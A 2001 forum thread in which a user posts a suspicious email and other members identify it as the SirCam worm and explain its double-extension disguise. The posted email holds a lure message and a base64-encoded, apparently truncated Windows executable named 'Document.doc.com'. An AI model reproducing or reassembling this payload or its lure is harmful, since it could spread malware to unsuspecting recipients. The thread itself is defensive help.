Results 1 to 16 of 16

Thread: Urgent. Please Help!

  1. #1

    Thread Starter
    Dazed Member
    Join Date
    Oct 1999
    Location
    Ridgefield Park, NJ
    Posts
    3,418

    Urgent. Please Help!

    Ok i got your attention. I just recieved a
    virus in my email and this has never happened
    to me before. The web address is unfamiliar to me.
    Is there anyway that i can trace where it originated from?

    And i was able to view the contents of
    the file using an option hotmail provides.
    Does this look like compiled source code to you?
    I havent a clue. Thanks all.



    From [email protected] Wed, 07 Nov 2001 04:39:28 -0800
    Received: from [12.26.191.39] by hotmail.com (3.2) with ESMTP id MHotMailBDB276640034400437230C1ABF270E7E0; Wed, 07 Nov 2001 04:39:09 -0800
    Received: from node5 (210.212.157.254) by mail_server with SMTP; Wed, 7 Nov 2001 07:38:49 -0800
    From: "sachet"<[email protected]>
    To: [email protected]
    Subject: Document
    date: Wed, 7 Nov 2001 18:07:30 +0530
    MIME-Version: 1.0
    X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
    X-Mailer: Microsoft Outlook Express 5.50.4133.2400
    Content-Type: multipart/mixed; boundary="----3647B4BD_Outlook_Express_message_boundary"
    Content-Disposition: Multipart message

    ------3647B4BD_Outlook_Express_message_boundary
    Content-Type: text/plain; charset=ISO-8859-1
    Content-Transfer-Encoding: quoted-printable
    Content-Disposition: message text

    Hi! How are you=3F

    I send you this file in order to have your advice

    See you later=2E Thanks

    ------3647B4BD_Outlook_Express_message_boundary
    Content-Type: application/mixed; name=Document.doc.com
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=Document.doc.com

    TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5k
    ZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBFAABMAQgAGV5CKgAA
    AAAAAAAA4ACOgQsBAhkAqAEAAGwAAAAAAACkqQEAABAAAADAAQAAAEAAABAAAAACAAABAAAA
    AAAAAAQAAAAAAAAAAMACAAAEAAAAAAAAAgAAAAAAEAAAQAAAAAAQAAAQAAAAAAAAEAAAAAAA
    AAAAAAAAAPABAK4RAAAAYAIAABgAAAAAAAAAAAAAAAAAAAAAAAAAMAIAOCAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAgAgAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAACQpwEAABAAAACoAQAABAAAAAAAAAAAAAAAAAAA
    IAAA4ERBVEEAAAAAlBwAAADAAQAAHgAAAKwBAAAAAAAAAAAAAAAAAEAAAMBCU1MAAAAAACUP
    AAAA4AEAAAAAAADKAQAAAAAAAAAAAAAAAAAAAADALmlkYXRhAACuEQAAAPABAAASAAAAygEA
    AAAAAAAAAAAAAAAAQAAAwC50bHMAAAAADAAAAAAQAgAAAAAAANwBAAAAAAAAAAAAAAAAAAAA
    AMAucmRhdGEAABgAAAAAIAIAAAIAAADcAQAAAAAAAAAAAAAAAABAAABQLnJlbG9jAAA4IAAA
    ADACAAAiAAAA3gEAAAAAAAAAAAAAAAAAQAAAUC5yc3JjAAAAAGAAAABgAgAAMAAAAAACAAAA
    AAAAAAAAAAAAAEAAAMwAAAAAAAAAAAAAAAAAgAIAAAAAAAAYAgAAAAAAAAAAAAAAAABAAABQ
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQQ
    QAAKBlN0cmluZ1gQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWBBAAAQAAAAAAAAA
    oCxAAKwsQACwLEAAtCxAAKgsQABwK0AAhCtAAMwrQAAHVE9iamVjdGQQQAAHB1RPYmplY3RY
    EEAAAAAAAAAABlN5c3RlbQAAhBBAAA8ISVVua25vd24AAAAAAQAAAAAAAAAAwAAAAAAAAEYG
    U3lzdGVtAAD/JbjxQQCLwP8ltPFBAIvA/yWw8UEAi8D/JazxQQCLwP8lqPFBAIvA/yWk8UEA
    i8D/JaDxQQCLwP8lnPFBAIvA/yWY8UEAi8D/JZTxQQCLwP8lkPFBAIvA/yWM8UEAi8D/JYjx
    QQCLwP8lzPFBAIvA/yWE8UEAi8D/JcjxQQCLwP8lgPFBAIvA/yV88UEAi8D/JXjxQQCLwP8l
    dPFBAIvA/yVw8UEAi8D/JWzxQQCLwP8laPFBAIvA/yVk8UEAi8D/JWDxQQCLwP8lXPFBAIvA
    /yVY8UEAi8D/JVTxQQCLwP8lxPFBAIvA/yVQ8UEAi8D/JUzxQQCLwP8lSPFBAIvA/yVE8UEA
    i8D/JdzxQQCLwP8l2PFBAIvA/yXU8UEAi8D/JUDxQQCLwP8lPPFBAIvA/yX88UEAi8D/Jfjx
    QQCLwP8l9PFBAIvA/yXw8UEAi8D/JezxQQCLwP8l6PFBAIvA/yXk8UEAi8BTg8S8uwoAAABU
    6FH////2RCQsAXQFD7dcJDCLw4PERFvDi8D/JTjxQQCLwP8lNPFBAIvA/yUw8UEAi8D/JSzx
    QQCLwP8lKPFBAIvA/yUk8UEAi8D/JSDxQQCLwP8lHPFBAIvAU1a+TORBAIM+AHU6aEQGAABq
    AOio////i8iFyXUFM8BeW8OhSORBAIkBiQ1I5EEAM9KLwgPAjUTBBIseiRiJBkKD+mR17IsG
    ixCJFl5bw5CJAIlABMOLwFNWi/KL2Oid////hcB1BTPAXlvDixaJUAiLVgSJUAyLE4kQiVgE
    iUIEiQOwAV5bw4tQBIsIiQqJUQSLFUzkQQCJEKNM5EEAw1NWV1VRi/GJFCSL6ItdAIsEJIsQ
    iRaLUASJVgSLO4tDCIvQA1MMOxZ1FIvD6Lf///+LQwiJBotDDAFGBOsWixYDVgQ7wnUNi8Po
    mv///4tDDAFGBIvfO+t1wovWi8XoVf///4TAdQQzwIkGWl1fXlvDjUAAU1ZXVYPE+IvYi/uL
    MotDCDvwcmyLzgNKBIvoA2sMO813XjvwdRuLQgQBQwiLQgQpQwyDewwAdUSLw+g1////6zuL
    CotyBAPOi/gDeww7z3UFKXMM6yaLCgNKBIkMJCv5iXwkBIsSK9CJUwyL1IvD6ND+//+EwHUE
    M8DrDLAB6wiLGzv7dYUzwFlaXV9eW8OQU1ZXi9qL8IH+AAAQAH0HvgAAEADrDIHG//8AAIHm
    AAD//4lzBGoBaAAgAABWagDo+P3//4v4iTuF/3Qji9O4UORBAOhs/v//hMB1E2gAgAAAagCL
    A1Do2f3//zPAiQNfXlvDkFNWV1WL2Yvyi+jHQwQAABAAagRoACAAAGgAABAAVeil/f//i/iJ
    O4X/dR+Bxv//AACB5gAA//+JcwRqBGgAIAAAVlXogP3//4kDgzsAdCOL07hQ5EEA6PX9//+E






    ------3647B4BD_Outlook_Express_message_boundary

  2. #2
    PowerPoster
    Join Date
    Jul 1999
    Posts
    5,923
    There's not a great deal you can do about

    Just be thankful it didn't infect you

  3. #3

  4. #4
    PowerPoster
    Join Date
    Jul 1999
    Posts
    5,923
    must be

    Ascii representation of assembler perhaps

  5. #5
    Lively Member
    Join Date
    Jun 2001
    Location
    Banana Republic
    Posts
    115
    That's just a simple com executable{attachment} disguised as a doc document.
    The purpose of the executable is to propagate by sending itself to several others in your contacts list.

    I have received them several times in the past few months, but never opened them.
    Marriage - is not a word, but a sentence.

  6. #6
    The body sounds familiar, like a SirCam or something.

  7. #7

    Thread Starter
    Dazed Member
    Join Date
    Oct 1999
    Location
    Ridgefield Park, NJ
    Posts
    3,418
    So the text is really nothing since it is actualy a .doc? Woud that be right? How could i get to the underlying program and coud i decompile it? Thanks

  8. #8
    Lively Member
    Join Date
    Jun 2001
    Location
    Banana Republic
    Posts
    115
    It's not a doc...delete it !!!
    Marriage - is not a word, but a sentence.

  9. #9
    Retired VBF Adm1nistrator plenderj's Avatar
    Join Date
    Jan 2001
    Location
    Dublin, Ireland
    Posts
    10,359
    Thats the sircam virus
    Microsoft MVP : Visual Developer - Visual Basic [2004-2005]

  10. #10

  11. #11

  12. #12
    Retired VBF Adm1nistrator plenderj's Avatar
    Join Date
    Jan 2001
    Location
    Dublin, Ireland
    Posts
    10,359
    No thats the sircam virus.
    Microsoft MVP : Visual Developer - Visual Basic [2004-2005]

  13. #13

  14. #14
    Retired VBF Adm1nistrator plenderj's Avatar
    Join Date
    Jan 2001
    Location
    Dublin, Ireland
    Posts
    10,359
    How many times do I have to say this... the body of that message is the sircam virus, and the way the attachment is named also indicates sircam.
    If mcaffee call it otherwise, then they're wrong.
    Microsoft MVP : Visual Developer - Visual Basic [2004-2005]

  15. #15

    Thread Starter
    Dazed Member
    Join Date
    Oct 1999
    Location
    Ridgefield Park, NJ
    Posts
    3,418
    No need to get your feathers in a ruffle. Im just saying what they say. I could care less what the name is or what type of virus it is.

  16. #16
    Retired VBF Adm1nistrator plenderj's Avatar
    Join Date
    Jan 2001
    Location
    Dublin, Ireland
    Posts
    10,359
    Originally posted by chrisjk
    no offense Jamie, but I think mcafee know more about viri that you do
    Yeah they probably do, but I remember distinctly that virus.
    I had to take it out of two infected sites, and its a pain in the hole.

    http://vil.nai.com/vil/virusSummary.asp?virus_k=99141


    [edit]
    This is the funlove virus :
    http://vil.nai.com/vil/virusSummary.asp?virus_k=10419
    [/edit]
    Microsoft MVP : Visual Developer - Visual Basic [2004-2005]

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width